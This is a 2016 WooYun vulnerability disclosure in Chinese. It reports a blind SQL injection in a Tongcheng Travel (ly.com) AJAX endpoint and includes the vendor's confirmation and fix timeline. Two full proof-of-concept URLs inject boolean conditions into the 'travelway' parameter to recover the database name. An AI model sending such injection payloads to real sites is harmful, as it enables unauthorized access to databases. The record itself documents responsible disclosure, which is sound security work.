神器而已之苏州同程旅游SQL注入漏洞

编号184913
Urlhttp://www.wooyun.org/bug.php?action=view&id=184913
漏洞状态厂商已经修复
漏洞标题神器而已之苏州同程旅游SQL注入漏洞
漏洞类型SQL注射漏洞
厂商苏州同程旅游网络科技有限公司
白帽子路人甲
提交日期2016-03-15 14:02:00
公开日期2016-03-17 15:38:00
修复时间2016-03-17 15:38:00
确认时间2016-03-15 00:00:00
Confirm Spend0
漏洞标签SQL注入
关注数0
收藏数0
白帽评级
白帽自评rank20
厂商评级
厂商评rank18
漏洞简介
你们这个站有waf吗?
漏洞细节

http://go.ly.com/ajax/GetNewRaiderInfo?type=1&desItemId=&desItemKind=&travelway=%27%E9%82%AE%E8%BD%AE%27)%20and%20substring(db_name(),1,1)=%27x%27%20and%20(1=1&pageSize=12&pageindex=1&viewtype=1&iid=0.9737567349802703


返回false,说明数据库第一位不是x

false.png


http://go.ly.com/ajax/GetNewRaiderInfo?type=1&desItemId=&desItemKind=&travelway=%27%E9%82%AE%E8%BD%AE%27)%20and%20substring(db_name(),1,1)=%27t%27%20and%20(1=1&pageSize=12&pageindex=1&viewtype=1&iid=0.9737567349802703


返回true,说明数据库第一位是t

true.png


POC

由于太卡了,我只跑了个库名

db_name() =  tccomdb

修复方案

状态信息 2016-03-15: 细节已通知厂商并且等待厂商处理中
2016-03-15: 厂商已经确认,细节仅向厂商公开
2016-03-17: 厂商已经修复漏洞并主动公开,细节向公众公开
厂商回复感谢关注同程旅游。
回应信息危害等级:高漏洞Rank:18 确认时间:2016-03-15 14:28
Showing 1-2 of 2 items.
评论内容评论人点赞数评论时间

:)

boooooom02016-03-15 17:32:00

被动测试?

hear7v02016-03-15 14:26:00